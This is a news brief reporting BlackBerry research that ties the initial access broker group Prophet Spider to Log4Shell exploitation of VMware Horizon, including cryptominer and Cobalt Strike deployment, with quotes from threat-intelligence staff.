Skip to main content
close search
site logo
Dive Brief

Blackberry links initial access broker activity to Log4Shell exploit in VMware Horizon

Published Jan. 26, 2022
David Jones's headshot
Reporter
Illustration of locks layered above circuity.
Traitov/iStock/Getty via Getty Images

Dive Brief: 

  • Threat researchers said attacks from an initial access broker (IAB) group called Prophet Spider coincide with the recently discovered Log4Shell vulnerability in VMware Horizon, according to Blackberry Research and Intelligence
  • Threat actors primarily installed cryptomining software onto affected systems, however in some cases they deployed Cobalt Strike beacons, according to Blackberry. 
  • Prophet Spider has a history of compromising networks and selling access to ransomware operators. It has similarities to the threat actor Zebra2104, however the two groups are considered competitors and do not have any known connections to each other, according to Jim Simpson, Blackberry director of threat intelligence. 

Dive Insight:

Threat researchers from Microsoft and other security providers previously disclosed efforts by initial access brokers to exploit the Log4j vulnerability, dubbed Log4Shell. IABs typically, acting as the middleman, gain access into a system then sell it to third-party threat actors, almost like brokering access to a home that has been broken into. 

Log4j is found in hundreds of millions of devices worldwide and VMware Horizon is a widely used virtual desktop application. The widespread interest by IABs may indicate the long-term potential of exploiting the vulnerability, according to threat researchers.

"When an access broker group takes interest in a vulnerability whose scope is unknown, it's a good indication that attackers see significant value in its exploitation," said Tony Lee, VP of global service technical operations at Blackberry.

The Log4j vulnerability is considered so potentially dangerous because attackers can gain remote access to a compromised environment using just a few simple lines of code. Unlike in other high-profile vulnerabilities, attackers do not need sophisticated engineering backgrounds, nor they do not need authenticated access. 

Attacks involving VMware Horizon involve exploitation of the Log4shell vulnerability in Apache Tomcat service, which is embedded in VMware Horizon, according to NHS Digital, which first reported the exploit earlier this month. 

"The exploitation activity we have seen is recent," Lee said. "However, since we now have evidence that they have weaponized the exploit and payload delivery, we should expect to see more of the same."

Recommended Reading

Filed Under: Vulnerability

Editors' picks

Company Announcements

View all | Post a press release
DigiCert Unveils 2025 Security Predictions
From DigiCert
November 21, 2024
Nile Adds Industry’s First Campus Zero Trust Delivered As a Service
From Nile
November 21, 2024
TrustNet Named 2024’s Best Compliance Advisory and Audit Firm at CDM’s Annual Top InfoSec Inno…
From TrustNet
November 06, 2024
Fathom5’s ARIA Technology Joins NSIN Propel Maritime Digital Defense Accelerator
From Fathom5
November 18, 2024
Editors' picks
Latest in Vulnerability
image/svg+xml
Industry Dive is an Informa business
© 2024 Industry Dive. All rights reserved. | View our other publications | Privacy policy | Terms of use | Take down policy.
Cookie Preferences / Do Not Sell